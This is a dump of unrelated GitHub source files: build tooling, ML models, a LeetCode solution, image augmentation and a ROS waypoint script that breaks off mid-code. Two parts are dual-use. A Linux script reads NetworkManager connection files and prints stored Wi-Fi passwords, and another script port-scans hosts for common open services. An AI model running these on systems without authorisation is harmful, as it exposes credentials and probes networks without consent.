platforms, list(find_links),\n        )\n        return distributions\n\n    def add_resolved_requirements(\n        self,\n        reqs: List[PythonRequirement],\n        platforms: Optional[List[Platform]] = None,\n        override_ipex_build_do_actually_add_distribution: bool = False,\n    ) -> None:\n        \"\"\"Multi-platform dependency resolution for PEX files.\n\n        :param reqs: A list of :class:`PythonRequirement` to resolve.\n        :param platforms: A list of :class:`Platform`s to resolve requirements for.\n            Defaults to the platforms specified by PythonSetup.\n        :param bool override_ipex_build_do_actually_add_distribution: When this PexBuilderWrapper is configured with\n            generate_ipex=True, this method won't add any distributions to\n            the output pex. The internal implementation of this class adds a\n            pex dependency to the output ipex file, and therefore needs to\n            override the default behavior of this method.\n        \"\"\"\n        distributions = self.resolve_distributions(reqs, platforms=platforms)\n        locations: Set[str] = set()\n        for platform, dists in distributions.items():\n            for dist in dists:\n                if dist.location not in locations:\n                    if self._generate_ipex and not override_ipex_build_do_actually_add_distribution:\n                        self._log.debug(\n                            f\"  *AVOIDING* dumping distribution into ipex: .../{os.path.basename(dist.location)}\"\n                        )\n                        self._register_distribution(dist)\n                    else:\n                        self._log.debug(\n                            f\"  Dumping distribution: .../{os.path.basename(dist.location)}\"\n                        )\n                        self.add_distribution(dist)\n                    locations.add(dist.location)\n\n    def _resolve_multi(\n        self,\n        interpreter: PythonInterpreter,\n        requirements: List[PythonRequirement],\n        platforms: Optional[List[Platform]],\n        find_links: Optional[List[str]],\n    ) -> Dict[str, List[Distribution]]:\n        \"\"\"Multi-platform dependency resolution for PEX files.\n\n        Returns, per platform, the distributions that must be included in order to satisfy a\n        set of requirements. 
This may\n involve distributions for multiple platforms.\n\n :param interpreter: The :class:`PythonInterpreter` to resolve for.\n :param requirements: A list of :class:`PythonRequirement` objects to resolve.\n :param platforms: A list of :class:`Platform`s to resolve for.\n :param find_links: Additional paths to search for source packages during resolution.\n :return: Map of platform name -> list of :class:`pkg_resources.Distribution` instances needed\n to satisfy the requirements on that platform.\n \"\"\"\n python_setup = self._python_setup_subsystem\n python_repos = self._python_repos_subsystem\n platforms = platforms or python_setup.platforms\n\n find_links = list(find_links) if find_links else []\n find_links.extend(python_repos.repos)\n\n # Individual requirements from pants may have a `repository` link attached to them, which is\n # extracted in `self.resolve_distributions()`. When generating a .ipex file with\n # `generate_ipex=True`, we want to ensure these repos are known to the ipex launcher when it\n # tries to resolve all the requirements from BOOTSTRAP-PEX-INFO.\n self._all_find_links.update(OrderedSet(find_links))\n\n distributions: Dict[str, List[Distribution]] = defaultdict(list)\n\n for platform in platforms:\n requirements_cache_dir = os.path.join(\n python_setup.resolver_cache_dir, str(interpreter.identity)\n )\n resolved_dists = resolve(\n requirements=[str(req.requirement) for req in requirements],\n interpreter=interpreter,\n platform=platform,\n indexes=python_repos.indexes,\n find_links=find_links,\n cache=requirements_cache_dir,\n allow_prereleases=python_setup.resolver_allow_prereleases,\n manylinux=python_setup.manylinux,\n )\n for resolved_dist in resolved_dists:\n distributions[platform].append(resolved_dist.distribution)\n\n return distributions\n\n def _create_source_dumper(self, tgt: Target) -> Callable[[str], None]:\n buildroot = get_buildroot()\n\n def get_chroot_path(relpath: str) -> str:\n if type(tgt) == Files:\n # Loose `Files`, as opposed to `Resources` or `PythonTarget`s, have no (implied) package\n # structure and so we chroot them relative to the build root so that they can be accessed\n # via the normal Python filesystem APIs just as they would be accessed outside the\n # chrooted environment. NB: This requires we mark the pex as not zip safe so\n # these `Files` can still be accessed in the context of a built pex distribution.\n self._builder.info.zip_safe = False\n return relpath\n return str(Path(relpath).relative_to(tgt.target_base))\n\n def dump_source(relpath: str) -> None:\n source_path = str(Path(buildroot, relpath))\n dest_path = get_chroot_path(relpath)\n\n self._all_added_sources_resources.append(Path(dest_path))\n if has_resources(tgt):\n self._builder.add_resource(filename=source_path, env_filename=dest_path)\n else:\n self._builder.add_source(filename=source_path, env_filename=dest_path)\n\n return dump_source\n\n def add_sources_from(self, tgt: Target) -> None:\n dump_source = self._create_source_dumper(tgt)\n self._log.debug(f\" Dumping sources: {tgt}\")\n for relpath in tgt.sources_relative_to_buildroot():\n try:\n dump_source(relpath)\n except OSError:\n self._log.error(f\"Failed to copy {relpath} for target {tgt.address.spec}\")\n raise\n\n if getattr(tgt, \"_resource_target_specs\", None) or getattr(\n tgt, \"_synthetic_resources_target\", None\n ):\n # No one should be on old-style resources any more. 
And if they are,\n # switching to the new python pipeline will be a great opportunity to fix that.\n raise TaskError(\n f\"Old-style resources not supported for target {tgt.address.spec}. Depend on resources() \"\n \"targets instead.\"\n )\n\n def _prepare_inits(self) -> Set[str]:\n chroot = self._builder.chroot()\n sources = chroot.get(\"source\") | chroot.get(\"resource\")\n missing_init_files = identify_missing_init_files(sources)\n if missing_init_files:\n with temporary_file(permissions=0o644) as ns_package:\n ns_package.write(\n b'__import__(\"pkg_resources\").declare_namespace(__name__) # type: ignore[attr-defined]'\n )\n ns_package.flush()\n for missing_init_file in missing_init_files:\n self._all_added_sources_resources.append(Path(missing_init_file))\n self._builder.add_source(\n filename=ns_package.name, env_filename=missing_init_file\n )\n return missing_init_files\n\n def set_emit_warnings(self, emit_warnings):\n self._builder.info.emit_warnings = emit_warnings\n\n def _set_major_minor_interpreter_constraint_for_ipex(\n self, info: PexInfo, identity: PythonIdentity,\n ) -> PexInfo:\n interpreter_name = identity.requirement.name\n major, minor, _patch = identity.version\n major_minor_only_constraint = f\"{interpreter_name}=={major}.{minor}.*\"\n return ipex_launcher.modify_pex_info(\n info, interpreter_constraints=[str(major_minor_only_constraint)]\n )\n\n def _shuffle_underlying_pex_builder(self) -> Tuple[PexInfo, Path]:\n \"\"\"Replace the original builder with a new one, and just pull files from the old chroot.\"\"\"\n # Ensure that (the interpreter selected to resolve requirements when the ipex is first run) is\n # (the exact same interpreter we used to resolve those requirements here). This is the only (?)\n # way to ensure that the ipex bootstrap uses the *exact* same interpreter version.\n self._builder.info = self._set_major_minor_interpreter_constraint_for_ipex(\n self._builder.info, self._builder.interpreter.identity\n )\n\n # Remove all the original top-level requirements in favor of the transitive == requirements.\n self._builder.info = ipex_launcher.modify_pex_info(self._builder.info, requirements=[])\n transitive_reqs = [dist.as_requirement() for dist in self._distributions.values()]\n self.add_direct_requirements(transitive_reqs)\n\n orig_info = self._builder.info.copy()\n\n orig_chroot = self._builder.chroot()\n\n # Mutate the PexBuilder object which is manipulated by this subsystem.\n self._builder = PEXBuilder(interpreter=self._builder.interpreter)\n self._builder.info = self._set_major_minor_interpreter_constraint_for_ipex(\n self._builder.info, self._builder.interpreter.identity\n )\n\n self._distributions = {}\n\n return (orig_info, Path(orig_chroot.path()))\n\n def _shuffle_original_build_info_into_ipex(self):\n \"\"\"Create a \"dehydrated\" ipex file without any of its requirements, and specify that in two\n *-INFO files.\n\n See ipex_launcher.py for details of how these files are used.\n \"\"\"\n orig_pex_info, orig_chroot = self._shuffle_underlying_pex_builder()\n\n # Gather information needed to create IPEX-INFO.\n all_code = [str(src) for src in self._all_added_sources_resources]\n prefixed_code_paths = [os.path.join(ipex_launcher.APP_CODE_PREFIX, src) for src in all_code]\n for src, prefixed in zip(all_code, prefixed_code_paths):\n # NB: Need to add under 'source' label for `self._prepare_inits()` to pick it up!\n self._builder.chroot().copy(\n os.path.join(str(orig_chroot), src), prefixed, label=\"source\"\n )\n\n python_repos = 
self._python_repos_subsystem\n python_setup = self._python_setup_subsystem\n\n # NB: self._all_find_links is updated on every call to self._resolve_multi(), and therefore\n # includes all of the links from python_repos.repos, as well as any links added within any\n # individual requirements from that resolve.\n\n resolver_settings = dict(\n indexes=list(python_repos.indexes),\n find_links=list(self._all_find_links),\n allow_prereleases=UnsetBool.coerce_bool(\n python_setup.resolver_allow_prereleases, default=True\n ),\n manylinux=python_setup.manylinux,\n )\n\n # IPEX-INFO: A json mapping interpreted in ipex_launcher.py:\n # {\n # \"code\": [],\n # \"resolver_settings\": {},\n # }\n ipex_info = dict(code=prefixed_code_paths, resolver_settings=resolver_settings,)\n with temporary_file(permissions=0o644) as ipex_info_file:\n ipex_info_file.write(json.dumps(ipex_info).encode())\n ipex_info_file.flush()\n self._builder.add_resource(filename=ipex_info_file.name, env_filename=\"IPEX-INFO\")\n\n # BOOTSTRAP-PEX-INFO: The original PEX-INFO, which should be the PEX-INFO in the hydrated .pex\n # file that is generated when the .ipex is first executed.\n with temporary_file(permissions=0o644) as bootstrap_pex_info_file:\n bootstrap_pex_info_file.write(orig_pex_info.dump().encode())\n bootstrap_pex_info_file.flush()\n self._builder.add_resource(\n filename=bootstrap_pex_info_file.name, env_filename=\"BOOTSTRAP-PEX-INFO\"\n )\n\n # ipex.py: The special bootstrap script to hydrate the .ipex with the fully resolved\n # requirements when it is first executed.\n # Extract the file contents of our custom app launcher script from the pants package.\n parent_module = module_dirname(module_dirname(ipex_launcher.__name__))\n ipex_launcher_provider = get_provider(parent_module)\n ipex_launcher_script = ipex_launcher_provider.get_resource_string(\n parent_module, \"ipex/ipex_launcher.py\"\n )\n with temporary_file(permissions=0o644) as ipex_launcher_file:\n ipex_launcher_file.write(ipex_launcher_script)\n ipex_launcher_file.flush()\n # Our .ipex file will use our custom app launcher!\n self._builder.set_executable(ipex_launcher_file.name, env_filename=\"ipex.py\")\n\n # The PEX-INFO we generate shouldn't have any requirements (except pex itself), or they will\n # fail to bootstrap because they were unable to find those distributions. 
Instead, the .pex file\n # produced when the .ipex is first executed will read and resolve all those requirements from\n # the BOOTSTRAP-PEX-INFO.\n self.add_resolved_requirements(\n [self._pex_requirement, self._setuptools_requirement],\n override_ipex_build_do_actually_add_distribution=True,\n )\n\n def freeze(self) -> None:\n if self._frozen:\n return\n\n if self._prepare_inits():\n dist = self._distributions.get(\"setuptools\")\n if not dist:\n self.add_resolved_requirements([self._setuptools_requirement])\n\n if self._generate_ipex:\n self._shuffle_original_build_info_into_ipex()\n\n self._builder.freeze(bytecode_compile=False)\n self._frozen = True\n\n def set_entry_point(self, entry_point):\n self._builder.set_entry_point(entry_point)\n\n def build(self, safe_path):\n self.freeze()\n self._builder.build(safe_path, bytecode_compile=False, deterministic_timestamp=True)\n\n def set_shebang(self, shebang):\n self._builder.set_shebang(shebang)\n\n def add_interpreter_constraint(self, constraint):\n self._builder.add_interpreter_constraint(constraint)\n\n def add_interpreter_constraints_from(self, constraint_tgts):\n # TODO this would be a great place to validate the constraints and present a good error message\n # if they are incompatible because all the sources of the constraints are available.\n # See: https://github.com/pantsbuild/pex/blob/584b6e367939d24bc28aa9fa36eb911c8297dac8/pex/interpreter_constraints.py\n constraint_tuples = {\n self._python_setup_subsystem.compatibility_or_constraints(tgt.compatibility)\n for tgt in constraint_tgts\n }\n for constraint_tuple in constraint_tuples:\n for constraint in constraint_tuple:\n self.add_interpreter_constraint(constraint)\n\n def add_direct_requirements(self, reqs):\n for req in reqs:\n self._builder.add_requirement(str(req))\n\n def add_distribution(self, dist):\n self._builder.add_distribution(dist)\n self._register_distribution(dist)\n\n def add_dist_location(self, location):\n self._builder.add_dist_location(location)\n dist = DistributionHelper.distribution_from_path(location)\n self._register_distribution(dist)\n\n def _register_distribution(self, dist):\n self._distributions[dist.key] = dist\n\n def set_script(self, script):\n self._builder.set_script(script)\n","repo_name":"mgrenonville/pants","sub_path":"src/python/pants/python/pex_build_util.py","file_name":"pex_build_util.py","file_ext":"py","file_size_in_byte":27457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"41507705276","text":"import torch\r\nimport torch.nn as nn\r\nimport numpy as np\r\nimport torch.nn.functional as F\r\nimport scipy.sparse as sp\r\n\r\n# Borrowed from https://github.com/PetarV-/DGI\r\nclass GCN(nn.Module):\r\n def __init__(self, in_ft, out_ft, bias=True):\r\n super(GCN, self).__init__()\r\n self.fc = nn.Linear(in_ft, out_ft, bias=False)\r\n self.act = nn.PReLU()\r\n self.to_q = nn.Linear(out_ft, out_ft, bias=False)\r\n self.to_k = nn.Linear(out_ft, out_ft, bias=False)\r\n self.to_v = nn.Sequential(nn.Linear(out_ft, out_ft, bias=False),\r\n nn.PReLU(),\r\n nn.Linear(out_ft, out_ft, bias=False)\r\n )\r\n self.attn = None\r\n if bias:\r\n self.bias = nn.Parameter(torch.FloatTensor(out_ft))\r\n self.bias.data.fill_(0.0)\r\n else:\r\n self.register_parameter('bias', None)\r\n\r\n for m in self.modules():\r\n self.weights_init(m)\r\n\r\n def weights_init(self, m):\r\n if isinstance(m, nn.Linear):\r\n torch.nn.init.xavier_uniform_(m.weight.data)\r\n if m.bias is not None:\r\n 
m.bias.data.fill_(0.0)\r\n\r\n # Shape of seq: (batch, nodes, features)\r\n def forward(self, seq, adj, sparse=False, attn=False, training=True):\r\n seq_fts = self.fc(seq)\r\n if sparse:\r\n out = torch.unsqueeze(torch.spmm(adj, torch.squeeze(seq_fts, 0)), 0)\r\n else:\r\n if attn:\r\n out = torch.bmm(adj, seq_fts)\r\n out_q = F.normalize(self.to_q(out), dim=-1)\r\n out_k = F.normalize(self.to_k(out), dim=-1)\r\n attn_mx = torch.einsum('bmd, bnd->bmn', (out_q, out_k))\r\n# attn_mx = torch.randn(adj.size()).cuda()\r\n div_loss = ((out_q - out_k)**2).sum(dim=-1).mean()\r\n \r\n zero_vec = -9e15*torch.ones_like(attn_mx)\r\n attention = torch.where(adj > 0, attn_mx, zero_vec)\r\n attention = F.softmax(attention, dim=-1)\r\n attention = F.dropout(attention, 0.1, training=training)\r\n out = self.to_v(torch.bmm(attention, out))\r\n return self.act(out), div_loss\r\n# out = torch.bmm(adj, seq_fts)\r\n# return self.act(out), 0\r\n else:\r\n out = torch.bmm(adj, seq_fts)\r\n return self.act(out)\r\n\r\n\r\n# Borrowed from https://github.com/PetarV-/DGI\r\nclass Readout(nn.Module):\r\n def __init__(self):\r\n super(Readout, self).__init__()\r\n\r\n def forward(self, seq, msk):\r\n if msk is None:\r\n return torch.mean(seq, 1)\r\n else:\r\n msk = torch.unsqueeze(msk, -1)\r\n return torch.mean(seq * msk, 1) / torch.sum(msk)\r\n\r\n\r\nclass Model(nn.Module):\r\n def __init__(self, n_in, n_h, projection=False):\r\n super(Model, self).__init__()\r\n self.gcn1 = GCN(n_in, n_h)\r\n self.gcn2 = GCN(n_in, n_h)\r\n self.read = Readout()\r\n\r\n self.sigm = nn.Sigmoid()\r\n self.new_dis = DIS(n_h, 256, projection)\r\n\r\n def forward(self, seq1, seq2, adj, diff, sparse, msk, samp_bias1, samp_bias2):\r\n h_1, div_loss = self.gcn1(seq1, adj, sparse, attn=True,training=True)\r\n c_1 = self.read(h_1, msk)\r\n c_1 = self.sigm(c_1)\r\n \r\n h_2 = self.gcn2(seq1, diff, sparse, attn=False)\r\n \r\n ret = self.new_dis(h_1, h_2)\r\n\r\n return ret, h_1, h_2, div_loss\r\n\r\n def embed(self, seq, adj, diff, sparse, msk):\r\n h_1, div_loss = self.gcn1(seq, adj, sparse, attn=True, training=False)\r\n h_2 = self.gcn2(seq, diff, sparse, attn=False)\r\n \r\n c = self.read(h_1, msk)\r\n return (h_1 + h_2).detach(), c.detach()\r\n\r\nclass LogReg(nn.Module):\r\n def __init__(self, ft_in, nb_classes):\r\n super(LogReg, self).__init__()\r\n self.fc = nn.Linear(ft_in, nb_classes)\r\n self.sigm = nn.Sigmoid()\r\n\r\n for m in self.modules():\r\n self.weights_init(m)\r\n\r\n def weights_init(self, m):\r\n if isinstance(m, nn.Linear):\r\n torch.nn.init.xavier_uniform_(m.weight.data)\r\n if m.bias is not None:\r\n m.bias.data.fill_(0.0)\r\n\r\n def forward(self, seq):\r\n ret = torch.log_softmax(self.fc(seq), dim=-1)\r\n return ret\r\n\r\nclass GEN(nn.Module):\r\n def __init__(self, out_dim, z_dim, contra_dim):\r\n super(GEN, self).__init__()\r\n self.gen = nn.Sequential(\r\n nn.Linear(out_dim+z_dim, out_dim, bias=False),\r\n nn.PReLU(),\r\n nn.Linear(out_dim, contra_dim, bias=False)\r\n )\r\n def forward(self, x, noise):\r\n \"\"\"\r\n :param x: batch * out_dim\r\n :param noise: batch * z_dim\r\n :return: batch * out_dim\r\n \"\"\"\r\n feature = torch.cat([x, noise], dim=-1)\r\n return self.gen(feature)\r\n\r\nclass DIS(nn.Module):\r\n def __init__(self, n_out, n_c, projection=False):\r\n super(DIS, self).__init__()\r\n# self.fc = nn.Linear(out_ft * 2, 1, bias=False)\r\n self.head = projection\r\n self.projection = nn.Sequential(\r\n nn.Linear(n_out, n_c),\r\n nn.PReLU(),\r\n nn.Linear(n_c, n_c)\r\n \r\n )\r\n def forward(self, 
graph1, graph2):\r\n if self.head:\r\n graph1 = self.projection(graph1)\r\n graph2 = self.projection(graph2)\r\n \r\n # B * N * N\r\n graph1 = F.normalize(graph1, dim=-1)\r\n graph2 = F.normalize(graph2, dim=-1)\r\n logits = torch.einsum('bnd, bmd->bnm', [graph1, graph2])\r\n return logits\r\n\r\n","repo_name":"Sherrylone/M-Mix","sub_path":"node/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5716,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"}
{"seq_id":"2969831761","text":"import csv\nfrom anytree import Node, RenderTree, AsciiStyle\n\n\nclass ParentNodes:\n def __init__(self, node_file, answers_file_csv):\n self.node_file = node_file\n self.answers_file_csv = answers_file_csv\n\n def create_nodes(self):\n with open(self.node_file, \"r\") as csvfile:\n csvreader = csv.reader(csvfile)\n # skip the header row\n next(csvreader)\n # create a dictionary to store the nodes\n nodes = {}\n for row in csvreader:\n # create a new node with the ID and label from the CSV row\n node_id = int(row[0])\n node_label = row[1]\n node = Node(node_label, id=node_id)\n # add the node to the dictionary\n nodes[node_id] = node\n return nodes\n\n def add_answer_nodes(self, nodes):\n with open(self.answers_file_csv, \"r\") as csvfile:\n csvreader = csv.reader(csvfile)\n # skip the header row\n next(csvreader)\n for row in csvreader:\n # get the ID of the parent node and the label of the answer\n parent_id = int(row[0])\n answer_label = \"[R]: \" + row[1]\n # create a new node for the answer\n answer_node = Node(answer_label, id=parent_id)\n # get the parent node from the dictionary\n parent_node = nodes.get(parent_id)\n if parent_node:\n # add the answer node as a child of the parent node\n answer_node.parent = parent_node\n return nodes\n\n def display_nodes(self, menus):\n for node in menus.values():\n for pre, fill, n in RenderTree(node, style=AsciiStyle()):\n print(f\"({n.id}): {n.name}\")\n return None\n","repo_name":"ngelrojas/script_questions","sub_path":"builder_tree/parent_nodes.py","file_name":"parent_nodes.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"28619452687","text":"#\n# @lc app=leetcode id=347 lang=python3\n#\n# [347] Top K Frequent Elements\n#\nfrom typing import List\nfrom collections import Counter, defaultdict\n\n# @lc code=start\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n nums_count = dict(Counter(nums))\n freq_value = defaultdict(list)\n for num, count in nums_count.items():\n freq_value[count].append(num)\n res = []\n for i in range(len(nums), -1, -1):\n if freq_value[i] != []:\n res.extend(freq_value[i])\n if len(res) == k:\n break\n return res\n\n\n# @lc code=end\n\n","repo_name":"Anderbone/leetcode","sub_path":"Python/347.top-k-frequent-elements.py","file_name":"347.top-k-frequent-elements.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"27030660591","text":"import socket\n\nhosts = list()\nports = [20, 21, 22, 23, 25, 42, 43, 53, 67, 69, 80, 110, 115, 123, 137, 138,\n 139, 143, 161, 179, 443, 445, 514, 515, 993, 995, 1080, 1194, 1433,\n 1702, 1723, 3128, 3268, 3306, 3389, 5432, 5060, 5900, 5938, 8080,\n 10000, 20000]\n\nanswer = input('Specify a website address (site) or a file path (file): ')\n\nif answer == 'site':\n hosts.append(input('Enter the website name without http/https, or an IP address: '))\nelse:\n pathFile = input('Enter the full path to the file: ')\n with open(pathFile, 'r', encoding='UTF-8') as f:\n for line in f:\n hosts.append(line.strip())\n\nprint(f'Hosts: {hosts}')\nprint('\\nPlease wait, scanning in progress!\\n')\n\nfor host in hosts:\n for port in ports:\n s = socket.socket()\n s.settimeout(1)\n\n try:\n s.connect((host, port))\n except socket.error:\n pass\n else:\n print(f'{host}: port {port} is active')\n\n s.close()\n\nprint('\\nScanning finished!\\n')\n","repo_name":"Thr0TT1e/scaner-ports","sub_path":"scanerPorts.py","file_name":"scanerPorts.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"28718643569","text":"import os\nimport argparse\nimport utils.WBAugmenter_Python.WBAugmenter.WBEmulator as wbAug\nfrom drfx.settings import BASE_DIR, MEDIA_ROOT, MEDIA_URL\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"WB color augmenter\")\n p = parser.add_argument\n p(\"--input_image_filename\", help=\"Input image's full filename (for a single image augmentation)\")\n p(\"--input_image_dir\", help=\"Training image directory (use it for batch processing)\")\n p(\"--out_dir\", help=\"Output directory\")\n p(\"--out_number\", type=int, default=10, help=\"Number of output images for each input image\")\n p(\"--write_original\", type=int, default=1, help=\"Save copy of original image(s) in out_dir\")\n p(\"--ground_truth_dir\", help=\"Ground truth directory\")\n p(\"--out_ground_truth_dir\", help=\"Output directory for ground truth files\")\n p(\"--ground_truth_ext\", help=\"File extension of ground truth files\")\n return parser.parse_args()\n\ndef augment_images(**kwargs):\n wbColorAug = wbAug.WBEmulator() # create an instance of the WB emulator\n # args = parse_args() # parse input arguments\n args = {\n 'input_image_filename' : None,\n 'input_image_dir' : None,\n 'out_dir' : None,\n 'out_number' : 10,\n 'write_original' : 1,\n 'ground_truth_dir' : None,\n 'out_ground_truth_dir' : None,\n 'ground_truth_ext' : None,\n }\n\n args.update(kwargs)\n if args[\"input_image_dir\"] is not None and args[\"ground_truth_dir\"] is not None: # if input and ground truth directories are provided, augment training/ground truth files\n if args[\"out_dir\"] is None:\n args[\"out_dir\"] = MEDIA_ROOT + \"/training_new\"\n if args[\"out_ground_truth_dir\"] is None:\n args[\"out_ground_truth_dir\"] = MEDIA_ROOT + \"/ground_truth_new\"\n os.makedirs(args[\"out_dir\"], exist_ok=True) # create output training directory (if not exist)\n os.makedirs(args[\"out_ground_truth_dir\"], exist_ok=True) # create output ground truth directory (if not exist)\n wbColorAug.trainingGT_processing(args[\"input_image_dir\"], args[\"out_dir\"], args[\"ground_truth_dir\"],\n args[\"out_ground_truth_dir\"], args[\"ground_truth_ext\"], args[\"out_number\"],\n args[\"write_original\"])\n elif args[\"input_image_dir\"] is not None: # if input directory provided, then do batch processing -- process all images inside this directory\n if args[\"out_dir\"] is None:\n args[\"out_dir\"] = MEDIA_ROOT + \"/results\"\n os.makedirs(args[\"out_dir\"], exist_ok=True) # create output directory (if not exist)\n wbColorAug.batch_processing(args[\"input_image_dir\"], args[\"out_dir\"], args[\"out_number\"], args[\"write_original\"])\n else: # process a single image\n if args[\"out_dir\"] is None:\n args[\"out_dir\"] = MEDIA_ROOT + \"/results\"\n os.makedirs(args[\"out_dir\"], exist_ok=True)\n paths = wbColorAug.single_image_processing(args[\"input_image_filename\"], 
args[\"out_dir\"], args[\"out_number\"],\n args[\"write_original\"])\n print(\"MEDIA_ROOT\", MEDIA_ROOT)\n print(\"MEDIA_URL\", MEDIA_URL)\n print(paths)\n return paths\n","repo_name":"polyedr/drfx_colour_augmenter","sub_path":"utils/WBAugmenter_Python/wbAug.py","file_name":"wbAug.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17129790189","text":"def solution(keymap, targets):\n answer = []\n key_dict = {}\n for keys in keymap:\n for i, key in enumerate(keys):\n if key not in key_dict or key_dict[key] > i+1:\n key_dict[key] = i+1\n \n for target in targets:\n count = 0\n for c in target:\n if c not in key_dict:\n count = -1\n break\n \n count += key_dict[c]\n answer.append(count)\n \n return answer","repo_name":"hogiljung/Algorithms","sub_path":"프로그래머스/unrated/160586. 대충 만든 자판/대충 만든 자판.py","file_name":"대충 만든 자판.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71905058152","text":"#!/usr/bin/python3\nimport configparser\nimport os\n\nconfig = configparser.ConfigParser()\n\nprofiles =[]\npath = \"/etc/NetworkManager/system-connections/\"\nfiles= os.listdir(path)\n\n \nif(len(files)>0):\n for file in files:\n fullPath = os.path.join(path,file)\n config.read(fullPath)\n sections = config.sections()\n if(len(sections)>0):\n for f in range(len(sections)):\n temp ={}\n if(\"wifi-security\"== sections[f]):\n data = config[sections[f]]\n for key in data:\n value = config[sections[f]][key]\n temp[key] = value\n temp[\"ssid\"] = config[\"wifi\"][\"ssid\"]\n profiles.append(temp)\n \n \n\n\n# Print out the password\n\nprint(\"auth-alg\"+\" \"*20,\"ssid\"+\" \"*20,\"key-mgmt\"+\" \"*20,\"psk\"+\" \"*20)\nfor dic in range(len(profiles)):\n print(\"{:28} {:28} {:28} {:28}\".format(profiles[dic]['auth-alg'],profiles[dic]['ssid'],profiles[dic]['key-mgmt'],profiles[dic]['psk']))\n \n \n \n \n \n \n ","repo_name":"LIBERTY-D/data-scraper","sub_path":"linux_wifi.py","file_name":"linux_wifi.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30313907810","text":"#!/usr/bin/python3\n\nimport math\nimport json\nimport random\nimport rospy\nimport copy\nfrom geometry_msgs.msg import PoseStamped, PoseWithCovarianceStamped,PoseArray\nfrom nav_msgs.msg import Path\nfrom std_msgs.msg import Bool\nfrom node_astar import *\n\nclass LocalGoalCreator:\n def __init__(self):\n rospy.init_node('WaypointCreator', anonymous=True)\n\n # param\n self.HZ = rospy.get_param(\"~HZ\", 10)\n self.WORLD_FRAME = rospy.get_param(\"~WORLD_FRAME\", 'map')\n self.ROBOT_FRAME = rospy.get_param(\"~ROBOT_FRAME\", 'base_link')\n # self.GOAL_DIS_TOLERANCE = rospy.get_param(\"~GOAL_DIS_TOLERANCE\", 0.3)\n # self.GOAL_YAW_TOLERANCE = rospy.get_param(\"~GOAL_YAW_TOLERANCE\", 1.0)\n # self.TIMEOUT = rospy.get_param(\"~TIMEOUT\", 180)\n\n self.estimated_pose_sub = rospy.Subscriber('/amcl_pose',PoseWithCovarianceStamped,self.estimated_pose_call_back)\n # self.global_goal_sub = rospy.Subscriber('/goal_reach',Bool,self.goal_reach_call_back)\n\n WAYPOINTS_PATH = rospy.get_param(\"~WAYPOINTS_PATH\",'/home/amsl/catkin_ws/src/global_path_creator/waypoints/waypoints.json')\n with open(WAYPOINTS_PATH) as f:\n waypoints_data = json.load(f)\n self.waypoints = []\n for wp in waypoints_data[\"WAYPOINTS\"]:\n self.waypoints.append([wp[\"x\"], 
wp[\"y\"], wp[\"yaw\"]])\n self.idx = 0\n\n # publisher\n self.waypoint_pub = rospy.Publisher('/waypoint', Path, queue_size=10)\n\n self.start_time = rospy.Time.now()\n self.goal_reach = True\n self.estimated_pose = PoseWithCovarianceStamped()\n self.global_goal_x = 0\n self.global_goal_y = 0\n\n self.maze = [[0, 0, 0, 0, 0],\n [0, 1, 0, 1, 0],\n [0, 0, 0, 0, 0],\n [0, 1, 0, 1, 0],\n [0, 0, 0, 0, 0]]\n self.split = 10\n self.set_node()\n self.global_path = Path()\n def set_node(self):\n # 218\n # 307\n # 456\n id0 = (2,2)\n id1 = (2,4)\n id2 = (0,4)\n id3 = (0,2)\n id4 = (0,0)\n id5 = (2,0)\n id6 = (0,4)\n id7 = (4,2)\n id8 = (4,4)\n self.id_list = [id0,id1,id2,id3,id4,id5,id6,id7,id8]\n\n def goal_callback(self, data):\n self.goal = data\n print(\"next goal: \")\n print(self.goal)\n self.start_time = rospy.Time.now()\n\n # def goal_reach_call_back(self,msg):\n # self.goal_reach = msg.data\n\n def estimated_pose_call_back(self,msg):\n\n self.estimated_pose = msg\n\n def next_waypoint(self):\n next_waypoint = PoseStamped()\n next_waypoint.header.frame_id = self.WORLD_FRAME\n ex = self.estimated_pose.pose.pose.position.x\n ey = self.estimated_pose.pose.pose.position.y\n waypoint_dis = 0\n next_waypoint_id = 0\n min_waypoint_id = 0\n next_waypoint_list = []\n max_dis = 1e5\n min_waypoint = 0\n path_id = []\n waypoint_size = len(self.waypoints)\n\n for i in range(waypoint_size):\n waypoint_dis = math.sqrt((ex - self.waypoints[i][0]) ** 2 + (ey - self.waypoints[i][1]) ** 2)\n if waypoint_dis > 15.0:\n next_waypoint_list.append(i)\n if waypoint_dis < max_dis:\n max_dis = waypoint_dis\n next_waypoint_id = i\n if waypoint_dis > min_waypoint:\n min_waypoint = waypoint_dis\n min_waypoint_id = i\n\n if len(next_waypoint_list) == 0:\n next_waypoint.pose.position.x = self.waypoints[next_waypoint_id][0]\n next_waypoint.pose.position.y = self.waypoints[next_waypoint_id][1]\n else:\n next_waypoint_id = random.choice(next_waypoint_list)\n next_waypoint.pose.position.x = self.waypoints[next_waypoint_id][0]\n next_waypoint.pose.position.y = self.waypoints[next_waypoint_id][1]\n\n path = astar(self.maze,self.id_list[min_waypoint_id],self.id_list[next_waypoint_id])\n # print(path)\n for i in path:\n for idx,id in enumerate(self.id_list):\n if id == i:\n path_id.append(idx)\n # if(self.reach_goal):\n self.local_goal_creator(path_id)\n\n def local_goal_creator(self,path_id):\n self.global_path = Path()\n path_id.reverse()\n path_point = PoseStamped()\n path_point.header.frame_id = \"map\"\n for i in range(len(path_id)-1):\n x1 = self.waypoints[path_id[i]][0]\n 